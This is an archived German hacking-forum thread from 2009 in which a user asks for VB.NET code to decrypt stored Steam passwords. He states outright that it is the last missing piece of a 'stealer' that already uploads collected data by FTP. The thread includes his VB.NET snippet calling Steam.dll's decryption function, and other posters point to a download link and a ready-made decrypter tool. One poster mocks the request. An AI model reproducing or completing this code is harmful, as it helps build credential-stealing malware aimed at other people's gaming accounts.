PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : steam pw decrypt



inmate
08.03.2009, 13:27
heyy leute ,

also ich habe schon wieder ein problem :x

ich komme einfach nicht mit dem decrypten des steam pw klar^^

ich würde mich freuen wenn einer vllt noch nen source in VBnet 2008 aufm pc rumliegen hätte und er diesen uppen könnte . ich werde daraus nur lernen und ih nicht einfach kopieren wie es viele tun -.-
weil in keinem buch steht wie sowas geht und bei google habe ich nur sources zu C# gefunden -.-

würde mich echt freuen

grüße

inmate

snify
08.03.2009, 13:45
soviel ich weiß ist das in VB nicht möglich.
kann mich aber auch irren.
Schau mal auf aluigi's page nach steampwd.
Da liegt ein C source drinn. Vielleicht kannst du das in VB umschreiben.

Viel Glück

inmate
08.03.2009, 14:45
habe diesen source gefunden aber irgendwie zeigt er mir immer unter
strichene wörter woran kann das liegen ?:confused:
wenns bei einem geht sagt es bitte !


Imports System.Runtime.InteropServices
Imports System.Text

Module SteamDecrypt

<DllImport("Steam.dll", CallingConvention:=CallingConvention.Cdecl)> _
Public Function SteamDecryptDataForThisMachine(ByVal encryptedData As String, _
ByVal encryptedDataSize As Integer, _
ByVal decryptedBuffer As StringBuilder, _
ByVal decryptedBufferSize As Integer, _
ByRef decryptedDataSize As Integer) As Integer
End Function

Sub Main(ByVal args() As String)

Dim encpwd As String = "91C6109CBA72D1AF587E74E860AB2348DFEBCE61EFC11C8020 5ECD4E18CDC2FAF200008284B7D6EC411631A03F02"
'string encpwd =
Dim decryptedDataSize As Integer = 0
Dim pwd As New StringBuilder
pwd.Length = encpwd.Length / 2
If SteamDecryptDataForThisMachine(encpwd, encpwd.Length, pwd, pwd.Length, _
decryptedDataSize) = 0 Then
Console.WriteLine(Constants.vbLf & " Password: " & pwd.ToString())
Else
Console.WriteLine("Error decrypting the Steam Password.")
End If
Console.ReadLine()
End Sub
End Module

Sirect
08.03.2009, 14:57
Sieht für mich ziemlich unvollständig aus.
Ich weiß dass es geht, habe auch Zugriff auf den Code, aber ich glaube den darf ich nicht Public machen...
Betriebsgeheimnis ^^

inmate
08.03.2009, 15:08
wenn du es doch darfst (kann ja sein ) dann schreib mir pls ne pm :)


oder kann mir jemand n source uppen wo man einfach nur den hash ausliest also mit streamwriter ?

weil irgendwie check ich das nich xD und das ist das einzige was mir bei meinem stealer noch fehlt -.-

Hamtaro
08.03.2009, 17:37
Ich weiß dass es geht, habe auch Zugriff auf den Code, aber ich glaube den darf ich nicht Public machen...Selten so gelacht, wenn du den Code hast, hast du ihn wenigstens nicht verstanden.
An dieser Sache gibt es überhaupt NICHTS mehr, was noch 1337-"Non-public" ist.
"Betriebsgeheimnis "... lächerlich!
Darüber hinaus scheint mir der Code sehr wohl vollständig zu sein, das einzige was noch fehlt ist das Auslesen des verschlüsselten PWs aus der clientregistry.blob
Und wenn ich dich hier, inmate, von "unter strichene"n Wörtern reden/schreiben hören/lesen muss, krieg ich schon wieder zuviel.
Wie wäre es erstmal mit einer grundsätzlichen Beschäftigung mit dem Thema?
Wie wäre es weiterhin mit einer anständigen BESCHREIBUNG deiner Probleme, nicht alle hier können deine Gedanken lesen (falls vorhanden)!
Und was "deinen" Stealer betrifft, du willst also eine Funktion, die du per Google gefunden hast, angepasst bekommen, dann willst du eine Erklärung, wie man das PW ausliest (da gibts im Übrigen ausführliche Beschreibunen bei aluigi drüber), danach hättest du vermutlich gerne eine Funktionen, mit der man eine Textdatei auf einen FTP-Server hochladen kann und dann willst du im Marktplatz deinen Steamstealer verkaufen, stimmts?
Diese dummdreiste Ignoranz geht mir ganz stark auf die Nerven.
Soviel dazu von mir, euch noch viel Spaß bei euren 1337en Diskussionen zu diesem Thema :)
Das mag jetzt vielleicht arrogant rüberkommen aber ich bin nunmal der festen Überzeugung, dass ich mehr Ahnung habe und mir das deshalb leisten kann ;)

inmate
08.03.2009, 18:20
-.- hamtaro... lese bitte meine posts ...
also ich habe die FTP funtion und das speichern in eine txt datei hnbekommen.
ich weis nur nicht wie man zu clienregistry blob kommt und den hash ausliest...
und ich habe gesagt ob vllt einer n source hätte damit ich daraus LERNEN kann ich hätte ihn nie!! kopiert und bei mir eingefügt oder abgechrieben.
nur nette leute die sich damit auskennen haben mir gesagt das ich mir direkt die sources angucken soll und nich erst auf irgendwelchen seiten nach ebooks gucken soll die mir bei stealern und trojanern wenig bringen.

mag ja sein das du mehr ahnung hast oder das du jetzt denkst ich wäre zu faul und ich würde nur einen fertigen source haben damit ich ihn kopieren kann .aber dann schreib doch einfach das du nicht einsiehst mir nen fertigen code zu geben weil du denkst ich wäre faul und nicht sowas lächerliches was ich garnich gesagt habe ....

lG

inmate

Sawyer
08.03.2009, 18:30
Ich habe so was schon mal geschrieben und auch im Forum veröffentlicht

kann nur nicht 100% garantieren das es so richtig ist , zumindest ist es rein von der Theorie her völlig Korrekt

http://rapidshare.com/files/176569200/SteamDecrypt.rar

wobei ich Hamtaro in allen Punkten zustimmen muss , und Leute die behaupten man soll direkt die sources angucken , können nur Ripper sein , wenn man genug skill hat bekommt ,man das in aller Regel auch ohne Codes aus dem Internet gebacken

zumindest was das auslesen des Hashes betrifft^^

aber vll hilft es dir ja ;)

MfG

inmate
08.03.2009, 19:38
wow was würde ich ohne papst nur machen xD


grosses danke

und ok buch ist schon bestellt dann mache ich eben das was ihr für richtig haltet :)

Sarge_stoni
11.03.2009, 22:08
gibts eig schon ein Decrypt Tool ??

inmate
13.03.2009, 22:29
kla von codesoft steam passwort decrypter :)